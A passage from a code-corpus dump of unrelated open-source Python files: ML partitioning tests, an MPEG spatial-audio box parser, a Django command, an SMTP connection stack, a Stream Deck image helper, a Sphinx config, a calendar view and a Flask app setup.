None, returns_json
)
returns_json.modify_request(request_builder)
assert not callable(request_builder.return_type)
def test_returns_JsonStrategy(mocker):
response = mocker.Mock(spec=["json"])
response.json.return_value = {"hello": "world"}
converter = returns.JsonStrategy(lambda x: x, "hello")
assert converter(response) == "world"
converter = returns.JsonStrategy(lambda y: y + "!", "hello")
assert converter(response) == "world!"
assert returns.JsonStrategy(1).unwrap() == 1
|
descarteslabs/common/graft/client/__init__.py | descarteslabs/descarteslabs-python | 167 | 12745179 | from .client import (
is_delayed,
is_function_graft,
value_graft,
keyref_graft,
apply_graft,
function_graft,
merge_value_grafts,
guid,
isolate_keys,
parametrize,
consistent_guid,
)
__all__ = [
"is_delayed",
"is_function_graft",
"value_graft",
"keyref_graft",
"apply_graft",
"function_graft",
"merge_value_grafts",
"guid",
"isolate_keys",
"parametrize",
"consistent_guid",
]
|
t5x/contrib/moe/partitioning_test.py | google-research/t5x | 278 | 12745188 | <gh_stars>100-1000
# Copyright 2022 The T5X Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for partitioning."""
from typing import Any
from absl.testing import absltest
from flax import core as flax_core
from flax import optim
from flax.linen import partitioning as flax_partitioning
import jax
import numpy as np
from t5x import train_state as train_state_lib
from t5x.contrib.moe import partitioning as moe_partitioning
from t5x.contrib.moe import training_utils
mock = absltest.mock
AxisMetadata = flax_partitioning.AxisMetadata
DataLayout = moe_partitioning.DataLayout
FlaxOptimTrainState = train_state_lib.FlaxOptimTrainState
InferenceState = train_state_lib.InferenceState
PartitionSpec = moe_partitioning.PartitionSpec
PRNGKey = Any
class LogicalAdam(optim.Adam):
"""Subclass of Adam optimizer with T5X logical axis partitioning support."""
def derive_logical_axes(self, optimizer_state, param_logical_axes):
"""Derives optimizer logical partitioning from model logical partitions."""
del param_logical_axes # Return fixed axes for test
optimizer_logical_axes = {
'state': {
'param_states': {
'logits_dense': {
'grad_ema': None,
'grad_sq_ema': None
},
'mlp': {
'wo': {
'kernel': {
'grad_ema': PartitionSpec('embed', 'mlp'),
'grad_sq_ema': None
}
}
}
},
'step': None
},
'target': {
'logits_dense': PartitionSpec('vocab', 'embed'),
'mlp': {
'wo': {
'kernel': PartitionSpec('embed', 'mlp'),
},
},
}
}
return optimizer_state.restore_state(optimizer_logical_axes)
def create_optimizer():
"""Creates simple Adam optimizer."""
target = {
'logits_dense': np.ones((16, 16), np.float32),
'mlp': {
'wo': {
'kernel': np.ones((32, 16), np.float32)
}
}
}
return LogicalAdam(learning_rate=1e-4).create(target)
class PartitioningTest(absltest.TestCase):
def test_default_data_layout(self):
# No expert replication required. Use default data layout.
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8, num_partitions=1)
self.assertFalse(partitioner.two_data_axes)
self.assertEqual(
partitioner.get_data_layout(batch_size=32),
DataLayout(
batch_size=32,
shard_id=0,
num_shards=1,
is_first_host_in_replica_set=True))
def test_two_data_axis_layout_override(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8, num_partitions=1)
# Force override case to check layout is valid.
partitioner.two_data_axes = True
partitioner._data_axis = ('data', 'model')
self.assertEqual(
partitioner.get_data_layout(batch_size=8),
DataLayout(
batch_size=8,
shard_id=0,
num_shards=1,
is_first_host_in_replica_set=True))
def test_logical_axes_for_moe_partitioner_no_overrides(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8,
num_partitions=1,
state_filter_fn=training_utils.match_fn(r'no_state_matching'))
optimizer = create_optimizer()
train_state = FlaxOptimTrainState(
optimizer,
params_axes={
'logits_dense_axes': AxisMetadata(names=('vocab', 'embed')),
'mlp': {
'wo': {
'kernel_axes': AxisMetadata(names=('embed', 'mlp'))
}
}
})
logical_axes = partitioner.get_logical_axes(train_state)
# No updates to state. Should match what derive_logical_axes() returns.
jax.tree_map(self.assertIsNone, logical_axes.param_states['logits_dense'])
self.assertEqual(logical_axes.param_states['mlp']['wo']['kernel'].grad_ema,
PartitionSpec('embed', 'mlp'))
self.assertIsNone(
logical_axes.param_states['mlp']['wo']['kernel'].grad_sq_ema)
self.assertEqual(
logical_axes.params, {
'logits_dense': PartitionSpec('vocab', 'embed'),
'mlp': {
'wo': {
'kernel': PartitionSpec('embed', 'mlp')
}
}
})
def test_logical_axes_for_moe_partitioner_with_overrides(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8,
num_partitions=1,
state_filter_fn=training_utils.match_fn(r'.*mlp.*'))
optimizer = create_optimizer()
train_state = FlaxOptimTrainState(
optimizer,
params_axes={
'logits_dense_axes': AxisMetadata(names=('vocab', 'embed')),
'mlp': {
'wo': {
'kernel_axes': AxisMetadata(names=('embed', 'mlp'))
}
}
})
logical_axes = partitioner.get_logical_axes(train_state)
jax.tree_map(self.assertIsNone, logical_axes.param_states['logits_dense'])
# 'mlp' params should be prepended with 'expert' spec because
# state_filter_fn matches '.*mlp.*'.
self.assertEqual(logical_axes.param_states['mlp']['wo']['kernel'].grad_ema,
PartitionSpec('expert', 'embed', 'mlp'))
self.assertEqual(
logical_axes.param_states['mlp']['wo']['kernel'].grad_sq_ema,
PartitionSpec('expert',))
self.assertEqual(
logical_axes.params, {
'logits_dense': PartitionSpec('vocab', 'embed'),
'mlp': {
'wo': {
'kernel': PartitionSpec('embed', 'mlp')
}
}
})
def test_inference_state_logical_axes(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8, num_partitions=1)
model_variables = flax_core.freeze({
'params': {
'dense': {
'bias': np.zeros(4),
'kernel': np.zeros((2, 4))
}
},
'params_axes': {
'dense': {
'bias_axes': AxisMetadata(names=('embed',)),
'kernel_axes': AxisMetadata(names=('vocab', 'embed')),
}
},
})
train_state = InferenceState.create(model_variables)
logical_axes = partitioner.get_logical_axes(train_state)
# No expert axis overrides to InferenceState. Partition specs should match
# input axis metadata.
self.assertEqual(
logical_axes,
InferenceState(
step=None,
params=flax_core.FrozenDict({
'dense': {
'bias': PartitionSpec('embed',),
'kernel': PartitionSpec('vocab', 'embed'),
},
})))
@mock.patch('jax.device_count')
def test_overridden_logical_axis_rules(self, device_count: int):
device_count.return_value = 4
# Fewer experts than devices --> modified axis rules with two 'batch' axes.
self.assertEqual(
moe_partitioning.standard_logical_axis_rules(
num_experts=1,
num_partitions=1,
model_parallel_submesh=None,
additional_rules=[('additional', 'model'),
('expert_magic', 'data')]),
[
('batch', ('data', 'model')), # Shard batch over entire mesh
# No sharding of weights over model axis.
('vocab', None),
('embed', None),
('mlp', None),
('heads', None),
('kv', None),
('joined_kv', None),
('relpos_buckets', None),
('abspos_buckets', None),
('length', None),
('layers', None),
('stack', None),
('mlp_activations', None),
('expert', 'data'), # Shard experts over "first" data axis only
('expert_mlp', None),
('expert_group', None),
# Experts replicated along "second" data axis
('expert_replicas', 'model'),
('unmodeled', None),
('additional', None),
('expert_magic', 'data'),
])
def test_default_logical_axis(self):
# Model parallelism used --> default logical axis rules.
self.assertEqual(
moe_partitioning.standard_logical_axis_rules(
num_experts=1,
num_partitions=2,
model_parallel_submesh=None,
additional_rules=[('additional', 'model')]),
[
('batch', 'data'), # Shard batch over single data axis
# Default model annotations used.
('vocab', 'model'),
('embed', None),
('mlp', 'model'),
('heads', 'model'),
('kv', None),
('joined_kv', 'model'),
('relpos_buckets', None),
('abspos_buckets', None),
('length', None),
('layers', None),
('stack', None),
('mlp_activations', None),
('expert', 'data'), # Shard experts along data axis
('expert_mlp', 'model'),
('expert_group', None),
('expert_replicas', None),
('unmodeled', None),
('additional', 'model'),
])
def test_data_partition_spec(self):
self.assertEqual(
moe_partitioning.data_partition_spec(two_data_axes=False),
PartitionSpec('data',))
self.assertEqual(
moe_partitioning.data_partition_spec(two_data_axes=True),
PartitionSpec(('data', 'model'),))
@mock.patch('jax.device_count')
def test_when_to_override_model_axis(self, device_count: int):
device_count.return_value = 4
# More experts than devices.
self.assertFalse(
moe_partitioning._override_model_axis(
num_experts=8, num_partitions=1, model_parallel_submesh=None))
# Fewer experts than devices.
self.assertTrue(
moe_partitioning._override_model_axis(
num_experts=1, num_partitions=1, model_parallel_submesh=None))
# Model parallelism used.
self.assertFalse(
moe_partitioning._override_model_axis(
num_experts=1, num_partitions=2, model_parallel_submesh=None))
def test_axis_resource_overrides(self):
input_resources = (PartitionSpec('data'), PartitionSpec('model'), None,
PartitionSpec('unrecognized'))
overridden_resources = moe_partitioning._override_partition_specs(
input_resources)
# "data" -> ("data", "model"). "model" -> None.
self.assertEqual(overridden_resources, (PartitionSpec(
('data', 'model'),), None, None, PartitionSpec('unrecognized',)))
if __name__ == '__main__':
absltest.main()
|
mpeg/sa3d.py | frade/spatialmedia | 1,469 | 12745199 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MPEG SA3D box processing classes.
Enables the injection of an SA3D box into an MPEG-4 file. The SA3D box
specification conforms to that outlined in docs/spatial-audio-rfc.md
"""
import struct
from spatialmedia.mpeg import box
from spatialmedia.mpeg import constants
def load(fh, position=None, end=None):
""" Loads the SA3D box located at position in an mp4 file.
Args:
fh: file handle, input file handle.
position: int or None, current file position.
Returns:
new_box: box, SA3D box loaded from the file location or None.
"""
if position is None:
position = fh.tell()
fh.seek(position)
new_box = SA3DBox()
new_box.position = position
size = struct.unpack(">I", fh.read(4))[0]
name = fh.read(4)
if (name != constants.TAG_SA3D):
print("Error: box is not an SA3D box.")
return None
if (position + size > end):
print("Error: SA3D box size exceeds bounds.")
return None
new_box.content_size = size - new_box.header_size
new_box.version = struct.unpack(">B", fh.read(1))[0]
new_box.ambisonic_type = struct.unpack(">B", fh.read(1))[0]
new_box.head_locked_stereo = (new_box.ambisonic_type & int('10000000', 2) != 0)
new_box.ambisonic_type = new_box.ambisonic_type & int('01111111', 2)
new_box.ambisonic_order = struct.unpack(">I", fh.read(4))[0]
new_box.ambisonic_channel_ordering = struct.unpack(">B", fh.read(1))[0]
new_box.ambisonic_normalization = struct.unpack(">B", fh.read(1))[0]
new_box.num_channels = struct.unpack(">I", fh.read(4))[0]
for i in range(0, new_box.num_channels):
new_box.channel_map.append(
struct.unpack(">I", fh.read(4))[0])
return new_box
class SA3DBox(box.Box):
ambisonic_types = {'periphonic': 0}
ambisonic_orderings = {'ACN': 0}
ambisonic_normalizations = {'SN3D': 0}
def __init__(self):
box.Box.__init__(self)
self.name = constants.TAG_SA3D
self.header_size = 8
self.version = 0
self.ambisonic_type = 0
self.head_locked_stereo = False
self.ambisonic_order = 0
self.ambisonic_channel_ordering = 0
self.ambisonic_normalization = 0
self.num_channels = 0
self.channel_map = list()
@staticmethod
def create(num_channels, audio_metadata):
new_box = SA3DBox()
new_box.header_size = 8
new_box.name = constants.TAG_SA3D
new_box.version = 0 # uint8
new_box.content_size += 1 # uint8
new_box.ambisonic_type = SA3DBox.ambisonic_types[
audio_metadata["ambisonic_type"]]
new_box.head_locked_stereo = audio_metadata["head_locked_stereo"]
new_box.content_size += 1 # uint8
new_box.ambisonic_order = audio_metadata["ambisonic_order"]
new_box.content_size += 4 # uint32
new_box.ambisonic_channel_ordering = SA3DBox.ambisonic_orderings[
audio_metadata["ambisonic_channel_ordering"]]
new_box.content_size += 1 # uint8
new_box.ambisonic_normalization = SA3DBox.ambisonic_normalizations[
audio_metadata["ambisonic_normalization"]]
new_box.content_size += 1 # uint8
new_box.num_channels = num_channels
new_box.content_size += 4 # uint32
channel_map = audio_metadata["channel_map"]
for channel_element in channel_map:
new_box.channel_map.append(channel_element)
new_box.content_size += 4 # uint32
return new_box
def ambisonic_type_name(self):
return next((key for key,value in SA3DBox.ambisonic_types.items()
if value==self.ambisonic_type))
def ambisonic_channel_ordering_name(self):
return next((key for key,value in SA3DBox.ambisonic_orderings.items()
if value==self.ambisonic_channel_ordering))
def ambisonic_normalization_name(self):
return next((key for key,value in SA3DBox.ambisonic_normalizations.items()
if value==self.ambisonic_normalization))
def print_box(self, console):
""" Prints the contents of this spatial audio (SA3D) box to the
console.
"""
ambisonic_type = self.ambisonic_type_name()
channel_ordering = self.ambisonic_channel_ordering_name()
ambisonic_normalization = self.ambisonic_normalization_name()
console("\t\tAmbisonic Type: %s" % ambisonic_type)
console("\t\tContains Head-Locked Stereo: %r" % self.head_locked_stereo)
console("\t\tAmbisonic Order: %d" % self.ambisonic_order)
console("\t\tAmbisonic Channel Ordering: %s" % channel_ordering)
console("\t\tAmbisonic Normalization: %s" % ambisonic_normalization)
console("\t\tNumber of Channels: %d" % self.num_channels)
console("\t\tChannel Map: %s" % str(self.channel_map))
def get_metadata_string(self):
""" Outputs a concise single line audio metadata string. """
metadata = "%s, %s, %s, Order %d, %d Channel(s), Channel Map: %s" \
% (self.ambisonic_normalization_name(),\
self.ambisonic_channel_ordering_name(),\
self.ambisonic_type_name(),\
self.ambisonic_order,\
self.num_channels,\
str(self.channel_map))
return metadata
def save(self, in_fh, out_fh, delta):
if (self.header_size == 16):
out_fh.write(struct.pack(">I", 1))
out_fh.write(struct.pack(">Q", self.size()))
out_fh.write(self.name)
elif(self.header_size == 8):
out_fh.write(struct.pack(">I", self.size()))
out_fh.write(self.name)
ambisonic_type = (
self.ambisonic_type | int('10000000', 2) if
self.head_locked_stereo else self.ambisonic_type & int('01111111', 2))
out_fh.write(struct.pack(">B", self.version))
out_fh.write(struct.pack(">B", ambisonic_type))
out_fh.write(struct.pack(">I", self.ambisonic_order))
out_fh.write(struct.pack(">B", self.ambisonic_channel_ordering))
out_fh.write(struct.pack(">B", self.ambisonic_normalization))
out_fh.write(struct.pack(">I", self.num_channels))
for i in self.channel_map:
if (i != None):
out_fh.write(struct.pack(">I", int(i)))
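# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal example of building a first-order ambiX SA3D box in memory; the
# metadata dict mirrors the keys create() reads and is an assumption about how
# the injector assembles it elsewhere in spatialmedia.
if __name__ == "__main__":
    example_metadata = {
        "ambisonic_type": "periphonic",
        "head_locked_stereo": False,
        "ambisonic_order": 1,
        "ambisonic_channel_ordering": "ACN",
        "ambisonic_normalization": "SN3D",
        "channel_map": [0, 1, 2, 3],
    }
    sa3d = SA3DBox.create(num_channels=4, audio_metadata=example_metadata)
    sa3d.print_box(print)
    print(sa3d.get_metadata_string())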
|
symposion/reviews/management/commands/promoteproposals.py | azkarmoulana/pycon | 154 | 12745200 | from django.core.management.base import BaseCommand
from django.db import connections
from symposion.reviews.models import ProposalResult, promote_proposal
class Command(BaseCommand):
def handle(self, *args, **options):
accepted_proposals = ProposalResult.objects.filter(status="accepted")
accepted_proposals = accepted_proposals.order_by("proposal")
for result in accepted_proposals:
promote_proposal(result.proposal)
connections["default"].cursor().execute("SELECT setval('schedule_session_id_seq', (SELECT max(id) FROM schedule_session))")
|
envelopes/connstack.py | siyaoyao/envelopes | 202 | 12745239 | # -*- coding: utf-8 -*-
# Copyright 2012 <NAME>. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY VINCENT DRIESSEN ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL VINCENT DRIESSEN OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Vincent Driessen.
#
"""
envelopes.connstack
===================
This module implements SMTP connection stack management.
"""
from contextlib import contextmanager
from .local import LocalStack, release_local
class NoSMTPConnectionException(Exception):
pass
@contextmanager
def Connection(connection):
push_connection(connection)
try:
yield
finally:
popped = pop_connection()
assert popped == connection, \
'Unexpected SMTP connection was popped off the stack. ' \
'Check your SMTP connection setup.'
def push_connection(connection):
"""Pushes the given connection on the stack."""
_connection_stack.push(connection)
def pop_connection():
"""Pops the topmost connection from the stack."""
return _connection_stack.pop()
def use_connection(connection):
"""Clears the stack and uses the given connection. Protects against mixed
use of use_connection() and stacked connection contexts.
"""
assert len(_connection_stack) <= 1, \
'You should not mix Connection contexts with use_connection().'
release_local(_connection_stack)
push_connection(connection)
def get_current_connection():
"""Returns the current SMTP connection (i.e. the topmost on the
connection stack).
"""
return _connection_stack.top
def resolve_connection(connection=None):
"""Convenience function to resolve the given or the current connection.
Raises an exception if it cannot resolve a connection now.
"""
if connection is not None:
return connection
connection = get_current_connection()
if connection is None:
raise NoSMTPConnectionException(
'Could not resolve an SMTP connection.')
return connection
_connection_stack = LocalStack()
__all__ = [
'Connection', 'get_current_connection', 'push_connection',
'pop_connection', 'use_connection'
]
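# --- Usage sketch (added for illustration; not part of the original module) ---
# How the stack is meant to be used around Envelopes' SMTP wrapper; the SMTP
# constructor arguments and the `envelope` object below are assumptions.
#
#   from envelopes.conn import SMTP
#   from envelopes.connstack import Connection, get_current_connection
#
#   conn = SMTP("smtp.example.com", port=587, login="user", password="secret")
#   with Connection(conn):
#       # Code inside the block resolves the connection implicitly.
#       get_current_connection().send(envelope)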
|
Interview Preparation Kit - Python/01. Warm-up Challenges/004. Repeated String.py | Snehakri022/HackerrankPractice | 831 | 12745270 | # Problem: https://www.hackerrank.com/challenges/repeated-string/problem
# Score: 20
def repeated_string(s, n):
return n // len(s) * s.count('a') + s[0: n % len(s)].count('a')
s = input()
n = int(input())
print(repeated_string(s, n))
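# Worked example (illustrative): for s = "aba" and n = 10, the repeated stream is
# "abaabaabaa"; 10 // 3 = 3 full copies contribute 3 * 2 = 6 'a's and the leftover
# prefix s[:10 % 3] = "a" contributes 1 more, giving 7.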
|
src/StreamDeck/ImageHelpers/PILHelper.py | rolandio/python-elgato-streamdeck | 517 | 12745329 | <reponame>rolandio/python-elgato-streamdeck
# Python Stream Deck Library
# Released under the MIT license
#
# dean [at] fourwalledcubicle [dot] com
# www.fourwalledcubicle.com
#
import io
def create_image(deck, background='black'):
"""
Creates a new PIL Image with the correct image dimensions for the given
StreamDeck device's keys.
.. seealso:: See :func:`~PILHelper.to_native_format` method for converting a
PIL image instance to the native image format of a given
StreamDeck device.
:param StreamDeck deck: StreamDeck device to generate a compatible image for.
:param str background: Background color to use, compatible with `PIL.Image.new()`.
:rtype: PIL.Image
:return: Created PIL image
"""
from PIL import Image
image_format = deck.key_image_format()
return Image.new("RGB", image_format['size'], background)
def create_scaled_image(deck, image, margins=[0, 0, 0, 0], background='black'):
"""
Creates a new key image that contains a scaled version of a given image,
resized to best fit the given StreamDeck device's keys with the given
margins around each side.
The scaled image is centered within the new key image, offset by the given
margins. The aspect ratio of the image is preserved.
.. seealso:: See :func:`~PILHelper.to_native_format` method for converting a
PIL image instance to the native image format of a given
StreamDeck device.
:param StreamDeck deck: StreamDeck device to generate a compatible image for.
:param Image image: PIL Image object to scale
    :param list(int) margins: Array of margin pixels in (top, right, bottom, left) order.
:param str background: Background color to use, compatible with `PIL.Image.new()`.
    :rtype: PIL.Image
:return: Loaded PIL image scaled and centered
"""
from PIL import Image
if len(margins) != 4:
raise ValueError("Margins should be given as an array of four integers.")
final_image = create_image(deck, background=background)
thumbnail_max_width = final_image.width - (margins[1] + margins[3])
thumbnail_max_height = final_image.height - (margins[0] + margins[2])
thumbnail = image.convert("RGBA")
thumbnail.thumbnail((thumbnail_max_width, thumbnail_max_height), Image.LANCZOS)
thumbnail_x = (margins[3] + (thumbnail_max_width - thumbnail.width) // 2)
thumbnail_y = (margins[0] + (thumbnail_max_height - thumbnail.height) // 2)
final_image.paste(thumbnail, (thumbnail_x, thumbnail_y), thumbnail)
return final_image
def to_native_format(deck, image):
"""
Converts a given PIL image to the native image format for a StreamDeck,
suitable for passing to :func:`~StreamDeck.set_key_image`.
.. seealso:: See :func:`~PILHelper.create_image` method for creating a PIL
image instance for a given StreamDeck device.
:param StreamDeck deck: StreamDeck device to generate a compatible native image for.
:param PIL.Image image: PIL Image to convert to the native StreamDeck image format
:rtype: enumerable()
:return: Image converted to the given StreamDeck's native format
"""
from PIL import Image
image_format = deck.key_image_format()
if image_format['rotation']:
image = image.rotate(image_format['rotation'])
if image_format['flip'][0]:
image = image.transpose(Image.FLIP_LEFT_RIGHT)
if image_format['flip'][1]:
image = image.transpose(Image.FLIP_TOP_BOTTOM)
if image.size != image_format['size']:
image.thumbnail(image_format['size'])
# We want a compressed image in a given codec, convert.
compressed_image = io.BytesIO()
image.save(compressed_image, image_format['format'], quality=100)
return compressed_image.getbuffer()
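# Usage sketch (illustrative, not part of the original library); assumes `deck`
# is an already opened StreamDeck instance and that 'icon.png' exists on disk:
#
#     from PIL import Image
#     icon = Image.open('icon.png')
#     key_image = create_scaled_image(deck, icon, margins=[5, 5, 5, 5])
#     deck.set_key_image(0, to_native_format(deck, key_image))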
|
docs/conf.py | modwizcode/luna | 609 | 12745332 |
# -- Project information -----------------------------------------------------
project = 'LUNA'
copyright = '2020 Great Scott Gadgets'
author = '<NAME>'
# -- General configuration ---------------------------------------------------
master_doc = 'index'
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon'
]
templates_path = ['_templates']
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
html_css_files = ['status.css']
# -- Options for automatic documentation -------------------------------------
# Skip documenting Tests.
def autodoc_skip_member_handler(app, what, name, obj, skip, options):
return \
name.endswith("Test") or \
name.startswith('_') or \
(name == "elaborate")
def setup(app):
app.connect('autodoc-skip-member', autodoc_skip_member_handler)
|
extra_views/dates.py | CleitonDeLima/django-extra-views | 974 | 12745359 | <filename>extra_views/dates.py
import datetime
import math
from calendar import Calendar
from collections import defaultdict
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Q
from django.utils.translation import gettext_lazy as _
from django.views.generic.dates import (
DateMixin,
MonthMixin,
YearMixin,
_date_from_string,
)
from django.views.generic.list import BaseListView, MultipleObjectTemplateResponseMixin
DAYS = (
_("Monday"),
_("Tuesday"),
_("Wednesday"),
_("Thursday"),
_("Friday"),
_("Saturday"),
_("Sunday"),
)
def daterange(start_date, end_date):
"""
Returns an iterator of dates between two provided ones
"""
for n in range(int((end_date - start_date).days + 1)):
yield start_date + datetime.timedelta(n)
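# Example (illustrative): daterange is inclusive of both endpoints, e.g.
#     list(daterange(datetime.date(2020, 1, 30), datetime.date(2020, 2, 1)))
# yields the three dates 2020-01-30, 2020-01-31 and 2020-02-01.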
class BaseCalendarMonthView(DateMixin, YearMixin, MonthMixin, BaseListView):
"""
A base view for displaying a calendar month
"""
first_of_week = 0 # 0 = Monday, 6 = Sunday
paginate_by = None # We don't want to use this part of MultipleObjectMixin
date_field = None
end_date_field = None # For supporting events with duration
def get_paginate_by(self, queryset):
if self.paginate_by is not None:
raise ImproperlyConfigured(
"'%s' cannot be paginated, it is a calendar view"
% self.__class__.__name__
)
return None
def get_allow_future(self):
return True
def get_end_date_field(self):
"""
Returns the model field to use for end dates
"""
return self.end_date_field
def get_start_date(self, obj):
"""
Returns the start date for a model instance
"""
obj_date = getattr(obj, self.get_date_field())
try:
obj_date = obj_date.date()
except AttributeError:
# It's a date rather than datetime, so we use it as is
pass
return obj_date
def get_end_date(self, obj):
"""
Returns the end date for a model instance
"""
obj_date = getattr(obj, self.get_end_date_field())
try:
obj_date = obj_date.date()
except AttributeError:
# It's a date rather than datetime, so we use it as is
pass
return obj_date
def get_first_of_week(self):
"""
Returns an integer representing the first day of the week.
0 represents Monday, 6 represents Sunday.
"""
if self.first_of_week is None:
raise ImproperlyConfigured(
"%s.first_of_week is required." % self.__class__.__name__
)
if self.first_of_week not in range(7):
raise ImproperlyConfigured(
"%s.first_of_week must be an integer between 0 and 6."
% self.__class__.__name__
)
return self.first_of_week
def get_queryset(self):
"""
Returns a queryset of models for the month requested
"""
qs = super().get_queryset()
year = self.get_year()
month = self.get_month()
date_field = self.get_date_field()
end_date_field = self.get_end_date_field()
date = _date_from_string(
year, self.get_year_format(), month, self.get_month_format()
)
since = date
until = self.get_next_month(date)
# Adjust our start and end dates to allow for next and previous
# month edges
if since.weekday() != self.get_first_of_week():
diff = math.fabs(since.weekday() - self.get_first_of_week())
since = since - datetime.timedelta(days=diff)
if until.weekday() != ((self.get_first_of_week() + 6) % 7):
diff = math.fabs(((self.get_first_of_week() + 6) % 7) - until.weekday())
until = until + datetime.timedelta(days=diff)
if end_date_field:
# 5 possible conditions for showing an event:
# 1) Single day event, starts after 'since'
# 2) Multi-day event, starts after 'since' and ends before 'until'
# 3) Starts before 'since' and ends after 'since' and before 'until'
# 4) Starts after 'since' but before 'until' and ends after 'until'
# 5) Starts before 'since' and ends after 'until'
predicate1 = Q(**{"%s__gte" % date_field: since, end_date_field: None})
predicate2 = Q(
**{"%s__gte" % date_field: since, "%s__lt" % end_date_field: until}
)
predicate3 = Q(
**{
"%s__lt" % date_field: since,
"%s__gte" % end_date_field: since,
"%s__lt" % end_date_field: until,
}
)
predicate4 = Q(
**{
"%s__gte" % date_field: since,
"%s__lt" % date_field: until,
"%s__gte" % end_date_field: until,
}
)
predicate5 = Q(
**{"%s__lt" % date_field: since, "%s__gte" % end_date_field: until}
)
return qs.filter(
predicate1 | predicate2 | predicate3 | predicate4 | predicate5
)
return qs.filter(**{"%s__gte" % date_field: since})
def get_context_data(self, **kwargs):
"""
Injects variables necessary for rendering the calendar into the context.
Variables added are: `calendar`, `weekdays`, `month`, `next_month` and
`previous_month`.
"""
data = super().get_context_data(**kwargs)
year = self.get_year()
month = self.get_month()
date = _date_from_string(
year, self.get_year_format(), month, self.get_month_format()
)
cal = Calendar(self.get_first_of_week())
month_calendar = []
now = datetime.datetime.utcnow()
date_lists = defaultdict(list)
multidate_objs = []
for obj in data["object_list"]:
obj_date = self.get_start_date(obj)
end_date_field = self.get_end_date_field()
if end_date_field:
end_date = self.get_end_date(obj)
if end_date and end_date != obj_date:
multidate_objs.append(
{
"obj": obj,
"range": [x for x in daterange(obj_date, end_date)],
}
)
continue # We don't put multi-day events in date_lists
date_lists[obj_date].append(obj)
for week in cal.monthdatescalendar(date.year, date.month):
week_range = set(daterange(week[0], week[6]))
week_events = []
for val in multidate_objs:
intersect_length = len(week_range.intersection(val["range"]))
if intersect_length:
# Event happens during this week
slot = 1
width = (
intersect_length # How many days is the event during this week?
)
nowrap_previous = (
True # Does the event continue from the previous week?
)
nowrap_next = True # Does the event continue to the next week?
if val["range"][0] >= week[0]:
slot = 1 + (val["range"][0] - week[0]).days
else:
nowrap_previous = False
if val["range"][-1] > week[6]:
nowrap_next = False
week_events.append(
{
"event": val["obj"],
"slot": slot,
"width": width,
"nowrap_previous": nowrap_previous,
"nowrap_next": nowrap_next,
}
)
week_calendar = {"events": week_events, "date_list": []}
for day in week:
week_calendar["date_list"].append(
{
"day": day,
"events": date_lists[day],
"today": day == now.date(),
"is_current_month": day.month == date.month,
}
)
month_calendar.append(week_calendar)
data["calendar"] = month_calendar
data["weekdays"] = [DAYS[x] for x in cal.iterweekdays()]
data["month"] = date
data["next_month"] = self.get_next_month(date)
data["previous_month"] = self.get_previous_month(date)
return data
class CalendarMonthView(MultipleObjectTemplateResponseMixin, BaseCalendarMonthView):
"""
A view for displaying a calendar month, and rendering a template response
"""
template_name_suffix = "_calendar_month"
|
app/__init__.py | johnwheeler/flask-live-starter | 119 | 12745372 | <reponame>johnwheeler/flask-live-starter<gh_stars>100-1000
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_pyfile('settings.cfg')
db = SQLAlchemy(app)
if not app.debug:
import logging
fmt = "%(levelname)s - %(asctime)s %(filename)s:%(lineno)d %(message)s"
formatter = logging.Formatter(fmt=fmt)
log_path = '/var/log/flask/{}.log'.format(__name__)
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(formatter)
app.logger.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
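# Illustrative note (not part of the original app): settings.cfg is expected to
# provide the Flask-SQLAlchemy configuration, at minimum something like
#     SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/app.db'
#     SQLALCHEMY_TRACK_MODIFICATIONS = False
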